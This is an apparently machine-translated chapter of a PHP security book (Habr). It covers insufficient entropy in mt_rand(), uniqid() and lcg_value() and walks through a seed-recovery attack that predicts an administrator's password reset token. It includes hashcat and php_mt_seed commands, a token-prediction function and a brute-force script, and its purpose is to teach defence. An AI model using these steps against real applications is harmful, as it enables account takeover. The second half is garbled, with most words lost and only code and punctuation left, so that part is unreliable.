📜 ⬆️ ⬇️

The book "Security in PHP" (Part 5). Lack of entropy for random values


The book "Security in PHP" (part 1)
The book "Security in PHP" (part 2)
The book "Security in PHP" (part 3)
The book "Security in PHP" (part 4)


Random values ​​in PHP everywhere. In all frameworks, in many libraries. Probably, you yourself wrote a bunch of code that uses random values ​​to generate tokens and salts, as well as input data for functions. Also, random values ​​play an important role in solving various problems:


  1. For random selection of options from a pool or a range of known options.
  2. To generate initialization vectors for encryption.
  3. To generate unpredictable tokens or one-time values ​​during authorization.
  4. To generate unique identifiers, such as session IDs.

In all these cases, there is a characteristic vulnerability. If an attacker guesses or predicts the output of your random number generator (RNG, Random Number Generator) or pseudo-random number generator (PRNG, Pseudo-Random Number Generator), then he will be able to calculate tokens, salts, one-time values ​​and cryptographic initialization vectors created using this generator. Therefore, it is very important to generate high-quality random values, i.e., those that are extremely difficult to predict. Do not allow the predictability of password reset tokens, CSRF tokens, API keys, one-time values ​​and authorization tokens!


Two other potential vulnerabilities are associated with random values ​​in PHP:


  1. Information Disclosure.
  2. Lack of entropy (Insufficient Entropy).

In this context, “disclosure of information” refers to the leakage of the internal state of the pseudo-random number generator - its initial value (seed value). Such leaks can greatly facilitate the prediction of future PRNG output.


The “lack of entropy” describes a situation where the variability of the initial internal state (seed) of a PRNG or its output is so small that the whole range of possible values ​​is relatively easily picked up by brute force. Not too good news for PHP programmers.


We take a closer look at both vulnerabilities with examples of attack scenarios. But first, let's see what is actually a random value when it comes to programming in PHP.


What do random values ​​do?


Confusion about the purpose of random variables is exacerbated by general misunderstanding. You've undoubtedly heard about the difference between cryptographically strong random values ​​and vague “unique” values ​​“for other uses”. The main impression is that random values ​​used in cryptography require high-quality randomness (or, more precisely, high entropy), and values ​​for other applications can do with less entropy. I find this impression false and counterproductive. The real difference between unpredictable random values ​​and those needed for trivial tasks is that the predictability of the second does not entail harmful consequences. This generally excludes cryptography from consideration of the issue. In other words, if you use a random value in a nontrivial problem, then you should automatically select a much stronger RNG.


The strength of random values ​​is determined by the entropy expended to generate them. Entropy is a measure of uncertainty expressed in bits. For example, if I take a binary bit, its value may be 0 or 1. If the attacker does not know the exact value, then we have entropy 2 bits (i.e. coin flip). If the attacker knows that the value is always 1, then we have an entropy of 0 bits, since predictability is the opposite of uncertainty. Also, the number of bits can be in the range from 0 to 2. For example, if 99% of the time a binary bit is 1, then the entropy can be a little higher than 0. So the more unspecified binary bits we choose, the better.


In PHP, this can be seen more clearly. The mt_rand() function generates random values, these are always numbers. It does not produce letters, special characters or other values. This means that for each byte, the attacker has far fewer guesses, that is, the entropy is low. If we replace mt_rand() reading bytes from the Linux source /dev/random , then we get really random bytes: they are generated based on the noise generated by the system device drivers and other sources. Obviously, this option is much better, because it provides significantly more bits of entropy.


The undesirability of mt_rand() is also indicated by the fact that this generator is not true random, but pseudo-random numbers, or, as it is also called, a deterministic random binary sequence generator (Deterministic Random Bit Generator, DRBG). It implements an algorithm called “Mersenne Twister” (Mersenne Twister), which generates numbers that are distributed in such a way that the result will be close to the result of the operation of a true random number generator. mt_rand() uses only one random value - the initial one (seed), on its basis a fixed algorithm generates pseudo-random values.


Take a look at this example, you can test it yourself:


 mt_srand(1361152757.2); for ($i=1; $i < 25; $i++) { echo mt_rand(), PHP_EOL; } 

This is a simple loop that is executed after the Mersenne Vortex PHP function has received an initial, predetermined value. It was obtained at the output of the function cited as an example in the documentation for mt_srand() and using current seconds and microseconds. If you execute the given code, it will display 25 pseudo-random numbers. They look random, no coincidences, everything is beautiful. Run the code again. Did you notice anything? Namely: the SAME NUMBERS are output. Run the third, fourth, fifth time. In older versions of PHP, the result may be different, but this does not apply to the problem, since it is typical of all modern versions of PHP.


If the attacker receives the initial value of such a PRNG, then he will be able to predict all the output of mt_rand() . So the protection of the initial value is of paramount importance. If you lose it, then you no longer have the right to generate random values ​​...


You can generate an initial value in one of two ways:



The second option is preferable, but today legacy applications often inherit the use of mt_srand() , even after porting to more modern versions of PHP.


This increases the risk that the attacker will restore the initial value (Seed Recovery Attack), which will give him enough information to predict future values. As a result, any application after such a leak becomes vulnerable to attack information disclosure. This is a real vulnerability, despite its obviously passive nature. Leakage of information about the local system can help the attacker in subsequent attacks, which violates the principle of echeloned defense.


PHP random values


PHP uses three PRNGs, and if an attacker gains access to the initial values ​​used in their algorithms, he will be able to predict the results of their work:


  1. Linear Congruential Generator (LCG), lcg_value() .
  2. Mersenne's whirlwind, mt_rand() .
  3. The locally supported C function rand() .

Also, these generators are used for internal needs, for functions like array_rand() and uniqid() . This means that an attacker can predict the output of these and other functions that use the internal PRNG of the PHP language, if they acquire all the necessary initial values. It also means that it will not be possible to improve protection by confusing the attacker through numerous appeals to the generators. This is especially true of open source applications. An attacker is able to predict ALL the output for any initial value known to him.


To improve the quality of random values ​​generated for non-trivial tasks, PHP needs external sources of entropy provided by the operating system. Linux usually uses /dev/urandom , you can read it directly or contact it indirectly, using the openssl_pseudo_random_bytes() or mcrypt_create_iv() functions. Both of them can use a cryptographically safe pseudo-random number generator (CSPRNG) on Windows, but in PHP, there is no direct method in the user space to get data from this generator without the extensions provided by these functions. In other words, make sure that the OpenSSL or Mcrypt extension is enabled in your PHP server version.


/dev/urandom - PRNG, but often it gets new initial values ​​from a high- /dev/random source /dev/random . This makes it an uninteresting target for an intruder. We try to avoid direct reading from /dev/random , because it is a blocking resource. If he exhausts entropy, then all readings will be blocked until enough entropy from the system environment is gathered again. Although for the most important tasks you should use /dev/random .


All this leads us to the rule:


  ,     ,   openssl_pseudo_random_bytes().           /dev/urandom.           ,                  . 

The basic implementation of this rule can be found in the SecurityMultiTool reference library . As usual, PHP internals prefer to make life harder for programmers instead of directly incorporating secure solutions into the PHP core.


Enough theory, now let's see how you can attack the application, armed with the above.


Attack to random number generators in PHP


For several reasons, PHP uses PRNG to solve non-trivial tasks.


The openssl_pseudo_random_bytes() function was available only in PHP 5.3. On Windows, it caused problems with locking until version 5.3.4 was released. Also in PHP 5.3, the mcrypt_create_iv() function in Windows began to support the MCRYPT_DEV_URANDOM source. Prior to this, only MCRYPT_RAND was supported in Windows - in fact, the same system PRNG used for internal needs by the rand() function. As you can see, before the advent of PHP 5.3, there were quite a few spaces, so many legacy applications written in previous versions could not switch to stronger PRNGs.


The choice of extensions Openssl and Mcrypt - at your discretion. Because you cannot rely on their availability even on servers running PHP 5.3, applications often use PRNGs built into PHP as a fallback for generating non-trivial random values.


But in both cases we have nontrivial tasks that apply random values ​​generated by PRNG with low entropy initial values. This makes us vulnerable to initial value attacks. Let's look at a simple example.


Imagine that we found an online application that uses the following code to generate tokens that are used in different tasks throughout the application:


 $token = hash('sha512', mt_rand()); 

There are more complex means of generating tokens, but this is a good option. Here, only one mt_rand() call is mt_rand() , hashed using SHA512. In practice, if the programmer decides that the functions of random values ​​in PHP are “fairly random”, then he will certainly choose a simplified approach until the word “cryptography” is heard. For example, non-cryptographic cases include access tokens, CSRF tokens, one-time API values, and password reset tokens. Before proceeding, I will describe in detail the entire vulnerability of this application, so that you can better understand what makes applications vulnerable at all.


Characteristics of the vulnerable application


This is not an exhaustive list. In practice, the list of characteristics may differ!


1. The server uses mod_php, which, when used with KeepAlive, allows you to handle several requests with the same PHP process


This is important because random number generators in PHP receive initial values ​​once per process. If we can make two queries to the process or more, then it will use the same initial value. The essence of the attack is to apply the disclosure of one token to extract the initial value, which is needed to predict another token generated on the basis of the SAME initial value (i.e. in the same process). Since mod_php is ideal for using multiple queries to get related random values, sometimes with just one query you can extract multiple values ​​related to mt_rand() . This makes redundant any mod_php requirements. For example, part of the entropy used to generate the initial value for mt_rand() may leak through session IDs or output values ​​in the same request.


2. The server reveals CSRF tokens, password reset tokens or account confirmation tokens generated based on mt_rand () - tokens


To extract the initial value, we need to directly check the number generated by the generators in PHP. And even it does not matter how it is used. We can extract it from any available value, whether it is mt_rand() output, or a CSRF hashed, or account verification token. Even indirect sources will be suitable, for which a random value determines a different output behavior, which reveals this very value. The main limitation is that it must be from the same process that generates the second token that we are trying to predict. And this is a “information disclosure” vulnerability. As we will see soon, PRNG output leakage can be extremely dangerous. Note that the vulnerability is not limited to a single application: you can read the PRNG output in one application on the server and use it to define the output in another application on the same server if they both use the same PHP process.


3. Known weak token generation algorithm


You can calculate it:



Some methods of generating tokens are more obvious, some are more popular. mt_rand() weak generation tools are distinguished by using one of the PHP random number generators (for example, mt_rand() ), weak entropy (no other sources of undefined data), and / or weak hashing (for example, MD5 or no hashing at all). The above code example just shows signs of a weak generation method. I also used SHA512 hashing to demonstrate that masking is always an unsatisfactory solution. SHA512 is a weak hash because it is quickly calculated, i.e. an attacker can brutally input data to any CPU or GPU at an incredible speed. And do not forget that Moore's law also still works, which means that the speed of the brute force will grow with each new generation of CPU / GPU. Therefore, passwords must be hashed using tools that crack the results of which take a fixed time, regardless of processor performance or Moore's law.


Execution attack


Our attack is quite simple. As part of the connection to the PHP process, we will conduct a quick session and send two separate HTTP requests (request A and request B). A session will be held by the server until a second request is received. Request A is aimed at getting some kind of available token like CSRF, a password reset token (sent to the attacker by mail) or something like that. Do not forget about other features like inline markup used in queries of arbitrary IDs, etc. We will torture the original token until it gives us its initial value. All of this is part of an attack with the restoration of the initial value: when the initial value has such a small entropy that it can be bruteformed or searched in a previously calculated rainbow table .


Request B will solve a more interesting problem. Let's make a request to reset the local admin password. This will start the token generation (using a random number based on the same initial value, which we pull out using request A, if both requests are successfully sent to the same PHP process). This token will be stored in the database, awaiting the moment when the administrator uses the password reset link sent to him in the mail. If we can retrieve the initial value for the token from query A, then, knowing how the token is generated from query B, we will predict the password reset token. So, we can follow the reset link before the administrator reads the letter!


Here is the sequence of events:


  1. Using query A, we get a token and reverse engineer it to calculate the initial value.
  2. Using query B, we get a token generated based on the same initial value. This token is stored in the application database for future password reset.
  3. Break the SHA512 hash to get the random number generated by the server.
  4. With the help of the obtained random value, a brutal force is the initial value that was generated with its help.
  5. We use the initial value to compute a series of random values ​​that can probably underlie the password reset token.
  6. Use this token (s) to reset the admin password.
  7. We get access to the administrator account, have fun and get benefits. Well, at least we have fun.

Tackling hacking ...


Step hacking application


Step 1. Execute request A to retrieve the token.


We assume that the target token and the password reset token depend on the output of mt_rand() . Therefore, you need to choose it. In the application in our imaginary scenario, all the tokens are generated in the same way, so you can simply remove the CSRF token and save it for the future.


Step 2. Execute query B to get a password reset token generated for the administrator account


This request is a simple send password reset form. The token will be saved in the database and sent to the user by mail. We need to correctly calculate this token. If server characteristics are accurate, then query B uses the same PHP process as query A. Therefore, in both cases, the mt_rand() calls will use the same initial value. You can even use query A to capture the CSRF token of the reset form to enable data entry (submission) to streamline the procedure (we exclude the intermediate round trip).


Step 3. We crack the hash of the SHA512 token received on request A


SHA512 inspires awe at programmers: it has the largest number in the entire family of SHA-2 algorithms . However, in the method of generating tokens chosen by our victim, there is one problem - random values ​​are limited only by numbers (that is, the degree of uncertainty, or entropy, is negligible). If you check the output of mt_getrandmax() , you will find that the largest random number that mt_rand() can generate is 2.147 billion with a trifle. This limited number of features makes SHA512 vulnerable to brute force.


Just do not take my word for it. If you have a discrete video card of one of the last generations, then you can go the following way. Since we are looking for a single hash, I decided to use a great tool for brute force - hashcat-lite . This is one of the fastest versions of hashcat, it is for all major operating systems, including Windows.


Using this code, generate a token:


 $rand = mt_rand(); echo "Random Number: ", $rand, PHP_EOL; $token = hash('sha512', $rand); echo "Token: ", $token, PHP_EOL; 

This code reproduces the token from request A (it contains the random number we need and is hidden in the SHA512 hash) and runs through hashcat:


 ./oclHashcat-lite64 -m1700 --pw-min=1 --pw-max=10 -1?d -o ./seed.txt <SHA512 Hash> ?d?d?d?d?d?d?d?d?d?d 

This is what all these options mean:



If everything works correctly and your GPU does not melt, Hashcat will calculate the hashed random number in a couple of minutes. Yes, minutes. I have already explained how entropy works. See for yourself. The mt_rand() function mt_rand() so few possibilities that it’s realistic to calculate SHA512 hashes of all values ​​in a very short time. So it was pointless to hash the output of mt_rand() .


Step 4. Restoring the initial value using a freshly broken random number


As we saw above, it takes only a couple of minutes to extract any generated mt_rand() value from SHA512. Armed with a random value, we can run another tool for brute force - php_mt_seed . This small utility takes the output mt_rand() and after bruteforce calculates the initial value, based on which the analyte could be generated. Download the current version, compile and run. If there are problems with compiling, try an older version (with the new ones I had problems with virtual environments).


 ./php_mt_seed <RANDOM NUMBER> 

This may take a little longer than hacking SHA512, since it is executed on the CPU. On a decent processor, the utility will find the entire possible range of the initial value in a few minutes. — (. . , ). : , PHP . , , , .


, , . mt_rand() , , (, mt_rand() ). , , . , mt_rand() Python.


5.


, mt_rand() . , :


 function predict($seed) { /** *   PRNG   */ mt_srand($seed); /** *       */ mt_rand(); /** *         */ $token = hash('sha512', mt_rand()); return $token; } 

.


6 7. !


URL, , . , , HTML ( ). XSS- , « » (Man-In-The-Browser). , ? , , , , . — , , .



mt_rand() . , mt_rand() , , « ».


, . , , mt_rand() - , , , «» , . , . mt_rand() — , ?


. mt_rand() ( ) . , mt_rand() . — , mt_rand() , .


. , , , , .



, PRNG, PHP, (. . ). :


 $token = hash('sha512', uniqid(mt_rand())); 

. , PHP- uniqid() . :


-.


, — . - , mt_rand() , mt_rand() - . uniqid() — . . . .


, «», . . . 1 000 000 . 1 , (, HTTP Date ), . , uniqid() -:


 gettimeofday((struct timeval *) &tv, (struct timezone *) NULL); sec = (int) tv.tv_sec; usec = (int) (tv.tv_usec % 0x100000); /* usec     0xF423F,     * usecs    . */ if (more_entropy) { spprintf(&uniqid, 0, "%s%08x%05x%.8F", prefix, sec, usec, php_combined_lcg(TSRMLS_C) * 10); } else { spprintf(&uniqid, 0, "%s%08x%05x", prefix, sec, usec); } RETURN_STRING(uniqid, 0); 

, PHP:


 function unique_id($prefix = '', $more_entropy = false) { list($usec, $sec) = explode(' ', microtime()); $usec *= 1000000; if(true === $more_entropy) { return sprintf('%s%08x%05x%.8F', $prefix, $sec, $usec, lcg_value()*10); } else { return sprintf('%s%08x%05x', $prefix, $sec, $usec); } } 

, uniqid() 13 . 8 — Unix ( ), . 5 — . , uniqid() , uniqid() :


 $id = uniqid(); $time = str_split($id, 8); $sec = hexdec('0x' . $time[0]); $usec = hexdec('0x' . $time[1]); echo 'Seconds: ', $sec, PHP_EOL, 'Microseconds: ', $usec, PHP_EOL; 

-. , :


 echo uniqid(), PHP_EOL; // 514ee7f81c4b8 echo uniqid('prefix-'), PHP_EOL; // prefix-514ee7f81c746 echo uniqid('prefix-', true), PHP_EOL; // prefix-514ee7f81c8993.39593322 


, , uniqid() — . , uniqid() . , , 1 000 000 . , . uniqid() :


 $token = hash('sha512', uniqid(mt_rand())); 

, , mt_rand() uniqid() , SHA512-, . uniqid() , , HTTP Date. . , !


 <?phpphp echo PHP_EOL; /** *        */ mt_srand(1361723136.7); $token = hash('sha512', uniqid(mt_rand())); /** *      , *  ,      HTTP Date    *  mt_rand()       ;) */ $httpDateSeconds = time(); $bruteForcedSeed = 1361723136.7; mt_srand($bruteForcedSeed); $prefix = mt_rand(); /** *  HTTP Date   ,    *    (second tick)   uniqid()  time(). */ for ($j=$httpDateSeconds; $j < $httpDateSeconds+2; $j++) { for ($i=0; $i < 1000000; $i++) { /** Replicate uniqid() token generator in PHP */ $guess = hash('sha512', sprintf('%s%8x%5x', $prefix, $j, $i)); if ($token == $guess) { echo PHP_EOL, 'Actual Token: ', $token, PHP_EOL, 'Forced Token: ', $guess, PHP_EOL; exit(0); } if (($i % 20000) == 0) { echo '~'; } } } 

?


, uniqid() TRUE:


 $token = hash('sha512', uniqid(mt_rand(), true)); 

-, php_combined_lcg() . lcg_value() , PHP- uniqid() . , , , . , . mt_rand() , PHP- .


 static void lcg_seed(TSRMLS_D) /* {{{ */ { struct timeval tv; if (gettimeofday(&tv, NULL) == 0) { LCG(s1) = tv.tv_sec ^ (tv.tv_usec<<11); } else { LCG(s1) = 1; } #ifdef ZTS LCG(s2) = (long) tsrm_thread_id(); #else LCG(s2) = (long) getpid(); #endif /* Add entropy to s2 by calling gettimeofday() again */ if (gettimeofday(&tv, NULL) == 0) { LCG(s2) ^= (tv.tv_usec<<11); } LCG(seeded) = 1; } 

- , . .


gettimeofday() Unix Epoch ( ). , , microsecond() , . ID , Linux 32 768. , 4 , /proc/sys/kernel/pid_max , .


, , LCG, . , mt_rand() ? , .


 #ifdef PHP_WIN32 #define GENERATE_SEED() (((long) (time(0) * GetCurrentProcessId())) ^ ((long) (1000000.0 * php_combined_lcg(TSRMLS_C)))) #else #define GENERATE_SEED() (((long) (time(0) * getpid())) ^ ((long) (1000000.0 * php_combined_lcg(TSRMLS_C)))) #endif 

, PHP . . , , : , ( 0 + - gettimeofday()) . gettimeofday() , ( PHP ). , mt_rand() , .


php_combined_lcg() . lcg_value() , PHP-. , . — , .


...


, . , php_combined_lcg() , — , . lcg_value() , mt_rand() , PRNG, PHP. lcg_value() , . LCG ( mt_srand() , , - -). , : PHP.


 spprintf(&buf, 0, "%.15s%ld%ld%0.8F", remote_addr ? remote_addr : "", tv.tv_sec, (long int)tv.tv_usec, php_combined_lcg(TSRMLS_C) * 10); 

(pre-hash) ID , IP, , … php_combined_lcg() . ( 1 ID 2 php_combined_lcg() , ), . , .


, , , PHP session.entropy_file session.entropy_length. ID , ( ) php_combined_lcg() LCG-. PHP 5.3 , , , . , ID LCG.


Windows- , LCG-.


, LCG , mt_rand() , mt_rand() .


uniqid() ?


 $token = hash('sha512', uniqid(mt_rand(), true)); 

. ( !). ID , ID.


, ? uniqid() , LCG, . , ID , , , ( !).



PHP . API PRNG- , . openssl mcrypt. , , , .


, , , . , mt_rand() , , . , , RandomLib . .


. , . . : , ; , . — .


RandomLib , . , mt_rand() , uniqid() lcg_value() , PID, , - , $_ENV, posix_times() . . , RandomLib. , - (. . , - hash() ).


 /** *  32-  .     : * — generateInt()      PHP_INT_MAX * — generateString()        */ $factory = new \RandomLib\Factory; $generator = $factory->getMediumStrengthGenerator(); $token = hash('sha512', $generator->generate(32)); 

, OpenSSL Mcrypt (footprint) RandomLib RandomLib , PRNG- SecurityMultiToo l.


')

Source: https://habr.com/ru/post/352446/


All Articles